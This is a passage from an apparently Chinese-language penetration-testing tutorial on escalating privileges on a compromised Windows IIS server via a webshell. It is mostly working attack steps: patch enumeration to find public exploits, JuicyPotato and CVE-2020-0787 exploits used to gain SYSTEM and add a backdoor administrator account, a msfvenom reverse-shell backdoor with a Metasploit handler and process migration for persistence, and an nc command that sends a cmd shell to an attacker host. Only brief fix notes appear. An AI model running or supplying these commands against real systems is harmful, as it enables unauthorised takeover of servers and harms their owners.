\u5de5\u5177\u7684\u539f\u7406\u662f<\/p>\n
    \n
  1. \n
    \u641c\u96c6CVE\u4e0eKB\u7684\u5bf9\u5e94\u5173\u7cfb\u3002\u9996\u5148\u5728\u5fae\u8f6f\u5b98\u7f51\u4e0a\u6536\u96c6CVE\u4e0eKB\u5bf9\u5e94\u7684\u5173\u7cfb\uff0c\u7136\u540e\u5b58\u50a8\u8fdb\u6570\u636e\u5e93\u4e2d<\/p>\n<\/li>\n
  2. \n
    \u67e5\u627e\u7279\u5b9aCVE\u7f51\u4e0a\u662f\u5426\u6709\u516c\u5f00\u7684EXP<\/p>\n<\/li>\n
  3. \n
    \u5229\u7528powershell\u811a\u672c\u6536\u96c6\u4e3b\u673a\u7684\u4e00\u4e9b\u7cfb\u7edf\u7248\u672c\u4e0eKB\u4fe1\u606f<\/p>\n<\/li>\n
  4. \n
    \u5229\u7528\u7cfb\u7edf\u7248\u672c\u4e0eKB\u4fe1\u606f\u641c\u5bfb\u4e3b\u673a\u4e0a\u5177\u6709\u5b58\u5728\u516c\u5f00EXP\u7684CVE<\/p>\n<\/li>\n<\/ol>\n
    \u53c2\u6570\u8bf4\u660e<\/p>\n
    # author: JC0o0l\n# GitHub: https:\/\/github.com\/chroblert\/\n\u53ef\u9009\u53c2\u6570:\n-h, --help show this help message and exit\n-u, --update-cve \u66f4\u65b0CVEKB\u6570\u636e\n-U, --update-exp \u66f4\u65b0CVEEXP\u6570\u636e\n-m MODE, --mode MODE \u642d\u914d-U\u4f7f\u7528\u3002\u66f4\u65b0\u6a21\u5f0f All:\u66f4\u65b0\u6240\u6709;Empty:\u53ea\u66f4\u65b0\u7a7a\u767d\u7684;Error:\u53ea\u66f4\n\u65b0\u4e4b\u524d\u672a\u6210\u529f\u66f4\u65b0\u7684\n-C, --check-EXP \u68c0\u7d22\u5177\u6709EXP\u7684CVE\n-n PRODUCTNAME, --productName PRODUCTNAME\n\u642d\u914d-C\u4f7f\u7528\u3002\u81ea\u5b9a\u4e49\u4ea7\u54c1\u540d\u79f0\uff0c\u5982Windows 10\n-N PRODUCTVERSION, --productVersion PRODUCTVERSION\n\u642d\u914d-C\u4f7f\u7528\u3002\u81ea\u5b9a\u4e49\u4ea7\u54c1\u7248\u672c\uff0c\u598220H2\n-f FILE, --file FILE ps1\u811a\u672c\u8fd0\u884c\u540e\u4ea7\u751f\u7684.json\u6587\u4ef6<\/code><\/pre>\n
    \u4f7f\u7528\u8bf4\u660e<\/p>\n
    1.\u9996\u5148\u8fd0\u884cpowershell\u811a\u672c KBCollect.ps \u6536\u96c6\u4e00\u4e9b\u4fe1\u606f \u8fd0\u884c\u540e\u5728\u76ee\u5f55\u4e0b\u751f\u6210kb.json<\/p>\n
    .KBCollect.ps1<\/p>\n
    Set-ExecutionPolicy -Scope CurrentUser<\/p>\n
    remotesigned<\/p>\n
      \n
    1. \n
      \u5c06\u8fd0\u884c\u540e\u4ea7\u751f\u7684 KB.json \u6587\u4ef6\u79fb\u52a8\u5230 cve-check.py \u6240\u5728\u7684\u76ee\u5f55<\/p>\n<\/li>\n
    2. \n
      \u5b89\u88c5\u4e00\u4e9bpython3\u6a21\u5757<\/p>\n<\/li>\n<\/ol>\n
      python3 -m pip install requirements.txt<\/p>\n
        \n
      1. \n
        \u8fd0\u884c cve-check.py -u \u521b\u5efaCVEKB\u6570\u636e\u5e93<\/p>\n<\/li>\n
      2. \n
        \u8fd0\u884c cve-check.py -U \u66f4\u65b0CVEKB\u6570\u636e\u5e93\u4e2d\u7684 hasPOC \u5b57\u6bb5<\/p>\n<\/li>\n<\/ol>\n
        \u6b64\u5904\u53ef\u4ee5\u4f7f\u7528-m\u9009\u62e9\u66f4\u65b0\u6a21\u5f0f\u3002<\/p>\n
        -m All:\u66f4\u65b0\u6240\u6709<\/p>\n
        -m Empty:\u53ea\u66f4\u65b0hasPOC\u5b57\u6bb5\u4e3a\u7a7a\u7684<\/p>\n
        -m Error:\u53ea\u66f4\u65b0hasPOC\u5b57\u6bb5\u4e3aError\u7684<\/p>\n
          \n
        1. \u8fd0\u884c cve-check.py -C -f KB.json \u67e5\u770b\u5177\u6709\u516c\u5f00EXP\u7684CVE\uff0c\u5982\u4e0b<\/li>\n<\/ol>\n
          python cve-check.py -C -f KB.json<\/p>\n
          7.\u5728webshell\u6267\u884c \u9700\u8981\u628a\u6e90\u7801\u8fdb\u884c\u4fee\u6539 \u628aOut-file\u7684\u6587\u4ef6\u5199\u5728\u53ef\u5199\u7684\u76ee\u5f55\u4e0a<\/p>\n
          \"1746584712364-c2620c2c-2fe9-475c-ac32-3231d5c0b855.png\"<\/p>\n
          webshell\u6267\u884cpowershell\u67e5\u8be2\u8865\u4e01 \u6267\u884c\u4f1a\u5728C:Windowstemp\u751f\u6210kb.json\u6587\u4ef6<\/p>\n
          \"1746584723155-7a4df34e-9a4b-427a-b838-6cbeb3b5f4b7.png\"<\/p>\n
          \"1746584731853-ef9ec735-fe2c-4924-97fc-da00cb8fcef5.png\"<\/p>\n
          \u628akb.json copy\u4e0b\u8f7d\u672c\u5730\u68c0\u6d4b<\/p>\n
          python cve-check.py -C -f KB.json<\/p>\n
          \u67e5\u8be2\u53ef\u5199\u76ee\u5f55\u6216\u6587\u4ef6<\/h2>\n
          \u786e\u5b9a\u53ef\u4ee5\u6267\u884ccmd\u547d\u4ee4\u65f6\uff0c\u6709\u4e9b\u670d\u52a1\u5668\u4f1a\u5bf9\u76ee\u5f55\u8fdb\u884c\u6743\u9650\u8bbe\u7f6e\uff0c\u5bfc\u81f4iis_user\u7528\u6237\u7ec4\u6ca1\u6709\u6743\u9650\u5bf9\u5e38\u89c1\u7684\u76ee\u5f55\u8fdb\u884c\u5199\u5165\u548c\u8bfb\u53d6\uff0c\u8fd9\u65f6\u53ef\u4ee5\u7528\u626b\u63cf\u53ef\u5199\u76ee\u5f55\u811a\u672c\u5bf9\u76ee\u5f55\u8fdb\u884c\u904d\u5386\u626b\u63cf\uff0c\u5f97\u5230\u53ef\u5199\u76ee\u5f55 \u4e0a\u4f20\u6216\u4e0b\u8f7d \u63d0\u6743exp \u6216\u66ff\u6362\u6587\u4ef6 \u8fdb\u884c\u5229\u7528<\/p>\n
          \u5e38\u89c1\u7684\u811a\u672c\u6709wt.asp \u7ea2\u8272\u8868\u793a\u6587\u4ef6\u53ef\u66ff\u6362 \u84dd\u8272\u8868\u793a\u76ee\u5f55\u53ef\u5199<\/p>\n
          \"1746584802879-6f517bbe-133e-4d82-9e6d-4f831c1257e3.png\"<\/p>\n
          net\u7248\u672c\u7684wt.aspx \u56e0\u4e3anet\u7684\u6743\u9650\u6bd4asp \u800c\u4e14\u80fd\u8bbf\u95ee\u6ce8\u518c\u8868 \u6240\u4ee5\u9664\u4e86\u5e38\u89c4\u626b\u63cf\u76ee\u5f55\u4e4b\u5916\uff0c\u8fd8\u4f1a\u8bfb\u53d6\u6ce8\u518c\u8868\u8f6f\u4ef6\u76ee\u5f55\u8fdb\u884c\u76ee\u5f55\u626b\u63cf<\/p>\n
          \"1746584812162-4fe87484-1120-4034-a416-82f675e5d9db.png\"<\/p>\n
          windows\u5e38\u7528\u63d0\u6743<\/h2>\n
          \u901a\u8fc7\u4e0a\u9762\u7684\u8865\u4e01\u67e5\u8be2\uff0c\u5217\u51fa\u53ef\u7528\u7684exp\uff0c\u5728webshell\u91cc\u4f7f\u7528\u63d0\u6743exp\u5bf9\u670d\u52a1\u5668\u8fdb\u884c\u63d0\u6743<\/p>\n
          CVE-2016-3225\uff08MS16-075\uff09\u63d0\u6743<\/h3>\n
          \u6f0f\u6d1e\u63cf\u8ff0<\/strong><\/p>\n
          \u5f53\u653b\u51fb\u8005\u8f6c\u53d1\u9002\u7528\u4e8e\u5728\u540c\u4e00\u8ba1\u7b97\u673a\u4e0a\u8fd0\u884c\u7684\u5176\u4ed6\u670d\u52a1\u7684\u8eab\u4efd\u9a8c\u8bc1\u8bf7\u6c42\u65f6\uff0cMicrosoft \u670d\u52a1\u5668\u6d88\u606f\u5757(SMB) \u4e2d\u5b58\u5728\u7279\u6743\u63d0\u5347\u6f0f\u6d1e\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u63d0\u5347\u7684\u7279\u6743\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002<\/p>\n
          \u82e5\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u9996\u5148\u5fc5\u987b\u767b\u5f55\u7cfb\u7edf\u3002\u7136\u540e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u8fd0\u884c\u4e00\u4e2a\u4e3a\u5229\u7528\u6b64\u6f0f\u6d1e\u800c\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684\u5e94\u7528\u7a0b\u5e8f\uff0c\u4ece\u800c\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\u6b64\u66f4\u65b0\u901a\u8fc7\u66f4\u6b63 Windows \u670d\u52a1\u5668\u6d88\u606f\u5757 (SMB) \u670d\u52a1\u5668\u5904\u7406\u51ed\u636e\u8f6c\u53d1\u8bf7\u6c42\u7684\u65b9\u5f0f\u6765\u4fee\u590d\u6b64\u6f0f\u6d1e\u3002<\/p>\n
          \u6ce8\uff1a\u70c2\u571f\u8c46(Rotten Potato)\u63d0\u6743\u662f\u4e00\u4e2a\u672c\u5730\u63d0\u6743\uff0c\u662f\u9488\u5bf9\u672c\u5730\u7528\u6237\u7684\uff0c\u4e0d\u80fd\u7528\u4e8e\u57df\u7528\u6237<\/p>\n
          \u5f71\u54cd\u7248\u672c<\/strong><\/p>\n
          https:\/\/docs.microsoft.com\/zh-cn\/security updates\/securitybulletins\/2016\/ms16-075<\/a><\/p>\n
          \u6f0f\u6d1e\u590d\u73b0<\/strong><\/p>\n
          \u5229\u7528\u6587\u4ef6<\/p>\n
          https:\/\/github.com\/itm4n\/PrintSpoofer?clienttype=8&version=7.55.1.101&from=win32_yunguanjia&channel=00000000000000000000000040000001&privilege=&pri_extra=<\/a><\/p>\n
          \u4e0b\u8f7d\u6587\u4ef6 https:\/\/github.com\/uknowsec\/JuicyPotato<\/a> \u4e0a\u4f20\u5230webshell\u7684\u53ef\u6267\u884c\u76ee\u5f55<\/p>\n
          \"1746585570309-5447d1b9-5e5f-4e80-8581-b481df4bfbaa.png\"<\/p>\n
          \u6267\u884c\u5b8c\u540e\u770b\u5230\u6743\u9650\u5df2\u7ecf\u662fsystem\u4e86 \u65b0\u5efa\u8d26\u53f7\u6dfb\u52a0\u5230\u7ba1\u7406\u5458\u7ec4<\/p>\n
          \/c c:windowsdebugWIAJuicyPotato_x64.exe -a "net user moon 123456 \/add && net localgroup administrators moon \/add"<\/p>\n
          \"1746585604870-0b130060-4515-41e3-a96c-5c066c25d769.png\"<\/p>\n
          \u6f0f\u6d1e\u4fee\u590d<\/strong><\/p>\n
          \u5347\u7ea7\u7248\u672c<\/p>\n
          CVE-2014-4113 (MS14-058)\u63d0\u6743<\/h3>\n
          \u6f0f\u6d1e\u63cf\u8ff0<\/strong><\/p>\n
          Microsoft Windows\u4e0b\u7684 win32k.sys\u662fWindows\u5b50\u7cfb\u7edf\u7684\u5185\u6838\u90e8\u5206\uff0c\u662f\u4e00\u4e2a\u5185\u6838\u6a21\u5f0f\u8bbe\u5907\u9a71\u52a8\u7a0b\u5e8f\uff0c\u5b83\u5305\u542b\u6709\u7a97\u53e3\u7ba1\u7406\u5668\u3001\u540e\u8005\u63a7\u5236\u7a97\u53e3\u663e\u793a\u548c\u7ba1\u7406\u5c4f\u5e55\u8f93\u51fa\u7b49\u3002\u5982\u679cWindows\u5185\u6838\u6a21\u5f0f\u9a71\u52a8\u7a0b\u5e8f\u4e0d\u6b63\u786e\u5730\u5904\u7406\u5185\u5b58\u4e2d\u7684\u5bf9\u8c61\uff0c\u5219\u5b58\u5728\u4e00\u4e2a\u7279\u6743\u63d0\u5347\u6f0f\u6d1e\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8fd0\u884c\u5185\u6838\u6a21\u5f0f\u4e2d\u7684\u4efb\u610f\u4ee3\u7801\u3002\u653b\u51fb\u8005\u968f\u540e\u53ef\u5b89\u88c5\u7a0b\u5e8f\uff1b\u67e5\u770b\u3001\u66f4\u6539\u6216\u5220\u9664\u6570\u636e\uff1b\u6216\u8005\u521b\u5efa\u62e5\u6709\u5b8c\u5168\u7ba1\u7406\u6743\u9650\u7684\u65b0\u5e10\u6237\u3002<\/p>\n
          \u5f71\u54cd\u7248\u672c<\/strong><\/p>\n
          \u8be5\u6f0f\u6d1e\u5f71\u54cd\u6240\u6709Windows x64\uff0c\u5305\u62ecWindows 7 \u548c Windows Server 2008 R2 \u53ca\u4ee5\u4e0b\u7248\u672c\u3002<\/p>\n
          \u6f0f\u6d1e\u590d\u73b0<\/strong><\/p>\n
          \u652f\u6301cmd\u6267\u884c<\/p>\n
          \u652f\u6301cmd\u6267\u884c \u5982\u679c\u5f00\u542f wscript.shell cmd\u6267\u884c\u6ca1\u53cd\u5e94 \u5927\u6982\u662f\u5f53\u524d\u7684\u7528\u6237\u65e0\u6cd5\u6267\u884c\u7cfb\u7edf\u76ee\u5f55\u4e0b\u7684cmd\uff0c\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u4e0a\u4f20\u6216\u8005\u8fdc\u7a0b\u4e0b\u8f7dcmd\u5230\u53ef\u5199\u53ef\u6267\u884c\u76ee\u5f55<\/p>\n
          \u4e0a\u4f20\u6210\u529f\u4e4b\u540e \u628a\u8def\u5f84\u586b\u5199\u8fdb\u6765\u6267\u884c \u4e5f\u662f\u53ef\u4ee5\u6267\u884c\u547d\u4ee4 \u5982\u679c\u4e0a\u4f20\u51fa\u9519\u663e\u793a \u7f3a\u5c11\u5bf9\u8c61 \u90a3\u662f\u56e0\u4e3a\u670d\u52a1\u5668\u4e0a\u4f20\u7684\u6587\u4ef6\u5927\u5c0f\u8d85\u51fa\u4e86<\/p>\n
          \u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u9009\u62e9webshell\u540e\u95e8\u91cc\u7684\u8fdc\u7a0b\u4e0b\u8f7d\u529f\u80fd \u4e0b\u8f7d\u8fdc\u7a0bcmd\u5230\u672c\u5730\u6307\u5b9a\u76ee\u5f55<\/p>\n
          \u4e0a\u4f20\u7f16\u8bd1\u597d\u7684\u63d0\u6743exp \u6267\u884c\u5373\u53ef\u83b7\u53d6\u7cfb\u7edf\u6743\u9650<\/p>\n
          \u6f0f\u6d1e\u4fee\u590d<\/strong><\/p>\n
          \u5347\u7ea7<\/p>\n
          CVE-2020-0787 \u63d0\u6743<\/h3>\n
          \u6f0f\u6d1e\u63cf\u8ff0<\/strong><\/p>\n
          \u5f53Windows Background Intelligent Transfer Service (BITS)\u672a\u80fd\u6b63\u786e\u5730\u5904\u7406\u7b26\u53f7\u94fe\u63a5\u65f6\uff0c\u5b58\u5728\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8986\u76d6\u5bfc\u81f4\u63d0\u5347\u72b6\u6001\u7684\u76ee\u6807\u6587\u4ef6\u3002\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u9996\u5148\u5fc5\u987b\u767b\u5f55\u5230\u7cfb\u7edf\u3002\u7136\u540e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u8fd0\u884c\u5de7\u5c3d\u5fc3\u601d\u6784\u5efa\u7684\u5e94\u7528\u7a0b\u5e8f\uff0c\u5229\u7528\u6b64\u6f0f\u6d1e\u5e76\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002<\/p>\n
          \u5f71\u54cd\u7248\u672c<\/strong><\/p>\n
          https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2020-0787<\/a><\/p>\n
          \u6f0f\u6d1e\u590d\u73b0<\/strong><\/p>\n
          \u4e0b\u8f7d\u5730\u5740 https:\/\/github.com\/cbwang505\/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\/releases<\/a><\/p>\n
          \u5efa\u7acb\u666e\u901a\u7528\u6237 net user moonsec 123456 \/add \u672c\u5730\u5207\u6362\u767b\u5f55 \u6267\u884c<\/p>\n
          c:windowsdebugWIABitsArbitraryFileMoveExploit.exe<\/p>\n
          \u4fee\u590d\u5efa\u8bae<\/strong><\/p>\n
          \u5347\u7ea7<\/p>\n
          \u4f7f\u7528metasplit \u63d0\u6743<\/h2>\n
          \u63cf\u8ff0<\/h3>\n
          metasplit \u662f\u4e00\u6b3e\u5f00\u6e90\u7684\u5b89\u5168\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\uff0c\u53ef\u4ee5\u5e2e\u52a9\u5b89\u5168\u548cIT\u4e13\u4e1a\u4eba\u58eb\u8bc6\u522b\u5b89\u5168\u6027\u95ee\u9898\uff0c\u9a8c\u8bc1\u6f0f\u6d1e\u7684\u7f13\u89e3\u63aa\u65bd\uff0c\u5e76\u7ba1\u7406\u4e13\u5bb6\u9a71\u52a8\u7684\u5b89\u5168\u6027\u8fdb\u884c\u8bc4\u4f30\uff0c\u63d0\u4f9b\u771f\u6b63\u7684\u5b89\u5168\u98ce\u9669\u60c5\u62a5\u3002\u8fd9\u4e9b\u529f\u80fd\u5305\u62ec\u667a\u80fd\u5f00\u53d1\uff0c\u4ee3\u7801\u5ba1\u8ba1\uff0cWeb\u5e94\u7528\u7a0b\u5e8f\u626b\u63cf\uff0c\u793e\u4f1a\u5de5\u7a0b\u3002\u56e2\u961f\u5408\u4f5c\uff0c\u5728Metasploit\u548c\u7efc\u5408\u62a5\u544a\u63d0\u51fa\u4e86\u4ed6\u4eec\u7684\u53d1\u73b0<\/p>\n
          \u63d0\u6743\u8fc7\u7a0b<\/h3>\n
          1\u3001\u5728 kali \u4e0a\u751f\u6210\u53cd\u5411\u8fde\u63a5\u540e\u95e8<\/p>\n
          msfvenom -p windows\/meterpreter\/reverse_tcp lhost=192.168.0.195 lport=12345 -f exe >s.exe<\/p>\n
          \"1746585889614-b62faae4-172b-4368-a740-34f1dceda5be.png\"<\/p>\n
          2\u3001\u628a\u751f\u6210\u7684\u540e\u95e8\u6587\u4ef6\u4e0a\u4f20\u5230\u53ef\u6267\u884c\u76ee\u5f55<\/p>\n
          3\u3001\u5728kali\u4e0a \u4f7f\u7528 msfconsole \u547d\u4ee4 \u542f\u52a8metasplite \u76d1\u542cip\u548c\u7aef\u53e3 \u8fd9\u91cc\u7684ip\u548c\u7aef\u53e3\u8981\u751f\u6210\u540e\u95e8\u7684\u7aef\u53e3\u548cip\u4e00\u81f4\uff0cip\u53ef\u4ee5\u8bbe\u7f6e\u62100.0.0.0 \u5141\u8bb8\u4efb\u4f55\u4e3b\u673a\u8fde\u63a5\u5165\u6765 \u4f46\u662f\u5b58\u5728\u98ce\u9669<\/p>\n
          use exploit\/multi\/handler\nset payload windows\/meterpreter\/reverse_tcp\nset lhost 192.168.0.195\nset lport 12345\nexploit<\/code><\/pre>\n
          4\u3001\u5728webshell\u91cc\u9762\u5141\u8bb8\u540e\u95e8<\/p>\n
          \"1746585951719-5c0ef7d3-3623-4106-b0a5-bd583b250f9e.png\"<\/p>\n
          5\u3001 \u83b7\u53d6meterpreter<\/p>\n
          \"1746585965784-0f96d1ab-10af-4c14-8583-4110a514b865.png\"<\/p>\n
          \"1746585970865-9b43109a-815b-4fc4-93f2-b505b24c5b1e.png\"<\/p>\n
          \u83b7\u53d6\u7cfb\u7edf\u4fe1\u606f\u548c\u5f53\u524d\u8d26\u53f7 \u53d1\u73b0\u6743\u9650\u8f83\u4f4e\u3002 \u9700\u8981\u8fdb\u884c\u63d0\u6743\uff0c\u63d0\u5347\u5f53\u524d\u6240\u5728\u670d\u52a1\u5668\u7684\u6743\u9650<\/p>\n
          6\u3001\u7279\u6743\u63d0\u5347<\/p>\n
          \u53ef\u4ee5\u4f7f\u7528\u5e38\u89c4\u7684\u63d0\u6743exp\u8fdb\u884c\u6d4b\u8bd5<\/p>\n
          windows \u5e38\u89c1\u7684\u63d0\u6743\u6a21\u5757<\/p>\n
          ms14_058 \u5185\u6838\u6a21\u5f0f\u9a71\u52a8\u7a0b\u5e8f\u4e2d\u7684\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\nms16_016 WebDAV\u672c\u5730\u63d0\u6743\u6f0f\u6d1e(CVE-2016-0051)\nms16_032 MS16-032 Secondary Logon Handle \u672c\u5730\u63d0\u6743\u6f0f\u6f0f\u6d1e<\/code><\/pre>\n
          7\u3001msf\u7684\u57fa\u7840\u547d\u4ee4<\/p>\n
          ps \u5217\u51fa\u8fdb\u7a0b<\/p>\n
          background \u628asession\u653e\u7f6e\u540e\u53f0<\/p>\n
          sessions \u67e5\u770b\u4f1a\u8bdd<\/p>\n
          back \u8fd4\u56de\u4e3b\u754c\u9762<\/p>\n
          shell\u5f97\u5230\u7ec8\u7aef<\/p>\n
          search\u641c\u7d22\u6a21\u5757<\/p>\n
          show \u5217\u6a21\u5757<\/p>\n
          info \u67e5\u770b\u6a21\u5757\u4fe1\u606f<\/p>\n
          use \u4f7f\u7528\u6a21\u5757<\/p>\n
          8\u3001\u67e5\u8be2\u8865\u4e01<\/p>\n
          run post\/windows\/gather\/enum_patches<\/p>\n
          9\u3001\u4f7f\u7528\u6a21\u5757\u8fdb\u884c\u63d0\u6743<\/p>\n
          \u641c\u7d22\u6a21\u5757 search ms14_058<\/p>\n
          \u67e5\u770b\u6a21\u5757\u4fe1\u606f<\/p>\n
          info exploit\/windows\/local\/ms16_075_reflection_juicy\nuse exploit\/windows\/local\/ms16_075_reflection_juicy\nshow options \u67e5\u770b\u9700\u8981\u8bbe\u7f6e\u4ec0\u4e48\u53c2\u6570\nset SESSION 1 \u8bbe\u7f6eSESSION \u4e3a1\nexploit \u8fd0\u884c<\/code><\/pre>\n
          \"1746586135155-0ea586dd-3480-4763-841e-06ab218f3ee0.png\"<\/p>\n
          \u53ef\u4ee5\u770b\u5230\u666e\u901aiis\u7528\u6237\u5df2\u7ecf\u6210\u529f\u63d0\u6743\u5230\u7cfb\u7edf\u6743\u9650<\/p>\n
          10\u3001\u7ef4\u6301\u6743\u9650<\/p>\n
          \u7cfb\u7edf\u662fx64\u7684 \u628a\u540e\u95e8\u8fc1\u79fb\u5230\u522b\u7684\u8fdb\u7a0b<\/p>\n
          ps \u5217\u51fa\u8fdb\u7a0b\u53f7<\/p>\n
          migrate 2744 explore\u8fdb\u7a0b\u4e2d<\/p>\n
          \"1746586160362-e9e1da7e-32f1-46e8-b0e2-16be3829ceca.png\"<\/p>\n
          \u4f7f\u7528\u6a21\u5757\u63d0\u6743\u5ba1\u67e5<\/h3>\n
          use post\/multi\/recon\/local_exploit_suggester\nset session 1\nexploit\nmsf6 exploit(multi\/handler) > use post\/multi\/recon\/local_exploit_suggester\nmsf6 post(multi\/recon\/local_exploit_suggester) > show options\nModule options (post\/multi\/recon\/local_exploit_suggester):\nName Current Setting Required Description\n---- --------------- -------- -----------\nSESSION yes The session to run this module on\nSHOWDESCRIPTION false yes Displays a detailed description\nfor the available exploits\nmsf6 post(multi\/recon\/local_exploit_suggester) > sessions -l\nActive sessions\n===============\nId Name Type Information\nConnection\n-- ---- ---- ----------- ----\n------\n1 meterpreter x86\/windows IIS APPPOOLDefaultAppPool @ 12SERVER7\n192.168.0.120:12345 -> 192.168.0.178:58932 (192.168.44.138)\nmsf6 post(multi\/recon\/local_exploit_suggester) > set SESSION 1\nSESSION => 1\nmsf6 post(multi\/recon\/local_exploit_suggester) > exploit\n[*] 192.168.44.138 - Collecting local exploits for x86\/windows...\n[*] 192.168.44.138 - 37 exploit checks are being tried...\nnil versions are discouraged and will be deprecated in Rubygems 4\n[+] 192.168.44.138 - exploit\/windows\/local\/ikeext_service: The target appears to\nbe vulnerable.\n[+] 192.168.44.138 -\nexploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc: The service is\nrunning, but could not be validated.\n[+] 192.168.44.138 - exploit\/windows\/local\/ms16_075_reflection: The target\nappears to be vulnerable.\n[+] 192.168.44.138 - exploit\/windows\/local\/ms16_075_reflection_juicy: The target\nappears to be vulnerable.\n[*] Post module execution completed\nmsf6 post(multi\/recon\/local_exploit_suggester) ><\/code><\/pre>\n
          \u6216\u8005\u5728meterpreter\u4f7f\u7528 run post\/multi\/recon\/local_exploit_suggester \u6267\u884c<\/p>\n
          \u4f46\u662f msf6 \u5747\u5931\u8d25 \u76ee\u524d\u672a\u77e5\u539f\u56e0 \u53ef\u80fd\u662f\u7cfb\u7edfbug<\/p>\n
          run post\/windows\/gather\/enum_patches<\/p>\n
          \u4ea4\u4e92shell\u548c\u975e\u4ea4\u4e92shell<\/h2>\n
          \u4ea4\u4e92shell\u5c31\u662fshell\u7b49\u5f85\u4f60\u7684\u8f93\u5165\uff0c\u5e76\u4e14\u7acb\u5373\u6267\u884c\u4f60\u63d0\u4ea4\u7684\u547d\u4ee4\u3002<\/p>\n
          \u8fd9\u79cd\u6a21\u5f0f\u88ab\u79f0\u4f5c\u4ea4\u4e92\u5f0f\u662f\u56e0\u4e3ashell\u4e0e\u7528\u6237\u8fdb\u884c\u4ea4\u4e92\u3002<\/p>\n
          \u8fd9\u79cd\u6a21\u5f0f\u4e5f\u662f\u5927\u591a\u6570\u7528\u6237\u975e\u5e38\u719f\u6089\u7684\uff1a\u767b\u5f55\u3001\u6267\u884c\u4e00\u4e9b\u547d\u4ee4\u3001\u7b7e\u9000\u3002\u5f53\u7b7e\u9000\u540e\uff0cshell\u4e5f\u7ec8\u6b62\u4e86\u3002<\/p>\n
          \u9700\u8981\u8fdb\u884c\u4fe1\u606f\u4ea4\u4e92\uff0c\u4f8b\u5982\u8f93\u5165\u67d0\u4e2a\u4fe1\u606f \u4f1a\u8fd4\u56de\u4fe1\u606f \u4f60\u9700\u8981\u5bf9\u5176\u8f93\u5165\u5185\u5bb9\uff0c\u8f93\u5165\u4f1a\u6267\u884c\u547d\u4ee4\u3002<\/p>\n
          \u4f8b\u5982 cmd \u7ec8\u7aef msf\u53cd\u5f39\u540e\u95e8shell nc\u53cd\u5f39shell \u8fd9\u4e9b\u90fd\u5c5e\u4e8e\u4ea4\u4e92shell<\/p>\n
          shell\u4e5f\u53ef\u4ee5\u8fd0\u884c\u5728\u53e6\u5916\u4e00\u79cd\u6a21\u5f0f\uff1a\u975e\u4ea4\u4e92\u5f0f\u6a21\u5f0f\uff0c\u4ee5shell script(\u975e\u4ea4\u4e92)\u65b9\u5f0f\u6267\u884c\u3002<\/p>\n
          \u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0cshell\u4e0d\u4e0e\u4f60\u8fdb\u884c\u4ea4\u4e92\uff0c\u800c\u662f\u8bfb\u53d6\u5b58\u653e\u5728\u6587\u4ef6\u4e2d\u7684\u547d\u4ee4,\u5e76\u4e14\u6267\u884c\u5b83\u4eec\u3002\u5f53\u5b83\u8bfb\u5230\u6587\u4ef6\u7684\u7ed3\u5c3e\uff0cshell\u4e5f\u5c31\u7ec8\u6b62\u4e86<\/p>\n
          \u53cd\u5f39shell\u63d0\u6743<\/h2>\n
          \u53cd\u5f39shell\u63d0\u6743\u662f\u4f7f\u7528\u5de5\u5177\u6216\u8005\u811a\u672c \u4ece\u670d\u52a1\u5668\u4e3b\u52a8\u8fde\u63a5\u653b\u51fb\u8005\u5ba2\u6237\u7aef\uff0c\u662f\u4ece\u5185\u90e8\u5411\u5916\u90e8\u901a\u4fe1\uff0c\u6240\u4ee5\u80fd\u7a7f\u900f\u9632\u706b\u5899\uff0c\u9632\u706b\u5899\u4e00\u822c\u53ea\u5bf9\u8fdb\u6765\u7684\u6d41\u91cf\u8fdb\u884c\u62e6\u622a\uff0c\u5e76\u4e0d\u5bf9\u4e3b\u52a8\u51fa\u53bb\u7684\u6d41\u91cf\u8fdb\u884c\u62e6\u622a\uff0c\u6240\u4ee5\u53cd\u5f39shell\u53ef\u4ee5\u5f88\u591a\u7684\u9003\u9038\u9632\u706b\u5899\uff0c\u53e6\u5916\u53cd\u5f39shell\u662f\u4ea4\u4e92shell\uff0c\u901a\u4fe1\u662f\u4ea4\u4e92\u7684\uff0c\u6240\u4ee5\u80fd\u6267\u884c\u7684\u547d\u4ee4\u66f4\u591a\uff0c\u800c\u4e14\u6ca1\u6709\u8d85\u65f6\u9650\u5236\uff0c\u53ef\u4ee5\u4ece\u53d7\u5bb3\u8005\u7684\u670d\u52a1\u5668\u4e0a\u4e0b\u8f7d\uff0c\u66f4\u591a\u7684\u8d44\u6599<\/p>\n
          nc \u53cd\u5f39 shell<\/h3>\n
          \u653b\u51fb\u8005\u76d1\u542c<\/p>\n
          nc -lvnp 6666<\/p>\n
          \u4e0a\u4f20nc \u5230\u670d\u52a1\u5668 \u5728\u670d\u52a1\u5668\u4e0a\u6267\u884cnc<\/p>\n
          \/c C:WindowsdebugWIAnc.exe -e c:windowssystem32cmd.exe 192.168.0.195 8080<\/code><\/p>\n
          \"1746600927814-c0c1ef2c-f35e-4d1f-b6df-ee4cb4d857cf.png\"<\/p>\n
          powershell\u53cd\u5f39cmd<\/h3>\n
          powercat\u662fnetcat\u7684powershell\u7248\u672c<\/p>\n
          \u4e0b\u8f7d\u5730\u5740https:\/\/github.com\/besimorhino\/powercat<\/a><\/p>\n
